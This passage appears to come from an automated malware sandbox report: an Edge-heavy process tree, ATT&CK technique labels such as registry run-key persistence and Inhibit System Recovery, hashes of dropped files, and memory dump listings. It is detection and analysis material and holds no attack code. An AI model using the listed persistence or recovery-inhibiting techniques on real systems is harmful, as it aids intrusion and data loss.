"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
5⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
5⤵
PID:3108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
5⤵
PID:4164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
5⤵
PID:1912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5100 /prefetch:8
5⤵
PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3708 /prefetch:8
5⤵
PID:612

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
5⤵
PID:1052

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:4680

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff61cad5460,0x7ff61cad5470,0x7ff61cad5480
6⤵
PID:3660

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
5⤵
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1
5⤵
PID:5068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3600 /prefetch:8
5⤵
PID:4376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1284 /prefetch:8
5⤵
PID:4340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:8
5⤵
PID:3704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3216 /prefetch:8
5⤵
PID:5264

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4548

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\kfx5819s5b
Filesize
1KB

MD5
5cf964f4fb92692d8ce2172ed6ad931e

SHA1
5cb6c7ac83b91ef93bfc77eca1e349913055a9d6

SHA256
8d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4

SHA512
109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6

Download Submit
C:\Users\Public\kfx5819s5b
Filesize
1KB

MD5
5cf964f4fb92692d8ce2172ed6ad931e

SHA1
5cb6c7ac83b91ef93bfc77eca1e349913055a9d6

SHA256
8d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4

SHA512
109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6

Download Submit
C:\Users\Public\kfx5819s5b
Filesize
1KB

MD5
5cf964f4fb92692d8ce2172ed6ad931e

SHA1
5cb6c7ac83b91ef93bfc77eca1e349913055a9d6

SHA256
8d40c44f2e00f9cc6cf4f360c654ec197bfbcf6412b132a770b28bcf622665d4

SHA512
109edf1982a363e8b37f802573d68d2c3cc1166ce811d5f191e1daa2c216961241c8d0fefee677036344b53b2292269408f5d5b10530da2075c2d50c92a033c6

Download Submit
C:\Users\Public\oz4xz8wjjjd3
Filesize
4KB

MD5
74aa8efaba61b11cbb7a21a6f114daa1

SHA1
3b0b3a65e3c186229ce65fa7b51d95e56972a892

SHA256
19ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42

SHA512
d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b

Download Submit
C:\Users\Public\oz4xz8wjjjd3
Filesize
4KB

MD5
74aa8efaba61b11cbb7a21a6f114daa1

SHA1
3b0b3a65e3c186229ce65fa7b51d95e56972a892

SHA256
19ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42

SHA512
d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b

Download Submit
C:\Users\Public\oz4xz8wjjjd3
Filesize
4KB

MD5
74aa8efaba61b11cbb7a21a6f114daa1

SHA1
3b0b3a65e3c186229ce65fa7b51d95e56972a892

SHA256
19ef60298d3918a927c9edd163288f2ac9da32570472fc5428e0dc67000aac42

SHA512
d11f1e2fe576dadcca0596dd99168bc6ebc65b8e3e065247fd14a84a589c0ea5d1ce5a9fbd4a7ca4f87c902d318560994eec8a41fc2a8cef7c30d64b19a46b2b

Download Submit
C:\Windows\Installer\MSID5C3.tmp
Filesize
54KB

MD5
eadaaa6edab657ed52d0b76325494469

SHA1
0c3b0c61e91857f715e737276c7fcd066117095d

SHA256
ec0ac9068fa7c0e422f0f090efb31e335ef87439bb5034e98a6d9f1a6e292acb

SHA512
df8d3602f086b2a84b203f489a678f0e0c0ad2ae2114b24619e61d4c780969dc267719d9a29d4ba8ae15acdc32afeb7982437570b51e465a362ce6a53b4bd621

Download Submit
C:\Windows\Installer\MSID5C3.tmp
Filesize
54KB

MD5
eadaaa6edab657ed52d0b76325494469

SHA1
0c3b0c61e91857f715e737276c7fcd066117095d

SHA256
ec0ac9068fa7c0e422f0f090efb31e335ef87439bb5034e98a6d9f1a6e292acb

SHA512
df8d3602f086b2a84b203f489a678f0e0c0ad2ae2114b24619e61d4c780969dc267719d9a29d4ba8ae15acdc32afeb7982437570b51e465a362ce6a53b4bd621

Download Submit
\??\pipe\LOCAL\crashpad_1344_IITJZNSHCXTOUKFD
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/320-165-0x0000000000000000-mapping.dmp

Download
memory/376-149-0x0000000000000000-mapping.dmp

Download
memory/612-162-0x0000000000000000-mapping.dmp

Download
memory/748-136-0x0000000000000000-mapping.dmp

Download
memory/928-131-0x0000000000000000-mapping.dmp

Download
memory/928-143-0x00000259967E0000-0x00000259967EC000-memory.dmp

Filesize
48KB

Download
memory/956-142-0x0000000000000000-mapping.dmp

Download
memory/1048-148-0x0000000000000000-mapping.dmp

Download
memory/1308-152-0x0000000000000000-mapping.dmp

Download
memory/1344-145-0x0000000000000000-mapping.dmp

Download
memory/1508-168-0x0000000000000000-mapping.dmp

Download
memory/1508-178-0x0000000000000000-mapping.dmp

Download
memory/1912-158-0x0000000000000000-mapping.dmp

Download
memory/2224-130-0x0000000000000000-mapping.dmp

Download
memory/2288-146-0x0000000000000000-mapping.dmp

Download
memory/2648-144-0x000001F8A20A0000-0x000001F8A20A3000-memory.dmp

Filesize
12KB

Download
memory/2712-176-0x0000000000000000-mapping.dmp

Download
memory/2736-167-0x0000000000000000-mapping.dmp

Download
memory/3108-154-0x0000000000000000-mapping.dmp

Download
memory/3124-170-0x0000000000000000-mapping.dmp

Download
memory/3132-172-0x0000000000000000-mapping.dmp

Download
memory/3416-169-0x0000000000000000-mapping.dmp

Download
memory/3660-164-0x0000000000000000-mapping.dmp

Download
memory/3668-177-0x0000000000000000-mapping.dmp

Download
memory/3704-200-0x0000000000000000-mapping.dmp

Download
memory/3736-180-0x0000000000000000-mapping.dmp

Download
memory/4164-156-0x0000000000000000-mapping.dmp

Download
memory/4240-160-0x0000000000000000-mapping.dmp

Download
memory/4340-198-0x0000000000000000-mapping.dmp

Download
memory/4356-175-0x0000000000000000-mapping.dmp

Download
memory/4376-196-0x0000000000000000-mapping.dmp

Download
memory/4468-137-0x0000000000000000-mapping.dmp

Download
memory/4484-171-0x0000000000000000-mapping.dmp

Download
memory/4520-140-0x0000000000000000-mapping.dmp

Download
memory/4680-163-0x0000000000000000-mapping.dmp

Download
memory/4784-173-0x0000000000000000-mapping.dmp

Download
memory/4828-166-0x0000000000000000-mapping.dmp

Download
memory/5068-182-0x0000000000000000-mapping.dmp

Download
memory/5264-202-0x0000000000000000-mapping.dmp

Download
memory/5420-183-0x0000000000000000-mapping.dmp

Download
memory/5428-184-0x0000000000000000-mapping.dmp

Download
memory/5436-185-0x0000000000000000-mapping.dmp

Download
memory/5560-186-0x0000000000000000-mapping.dmp

Download
memory/5572-187-0x0000000000000000-mapping.dmp

Download
memory/5608-188-0x0000000000000000-mapping.dmp

Download
memory/5700-189-0x0000000000000000-mapping.dmp

Download
memory/5712-190-0x0000000000000000-mapping.dmp

Download
memory/5740-191-0x0000000000000000-mapping.dmp

Download
memory/5836-192-0x0000000000000000-mapping.dmp

Download
memory/5876-193-0x0000000000000000-mapping.dmp

Download
memory/5912-194-0x0000000000000000-mapping.dmp

Download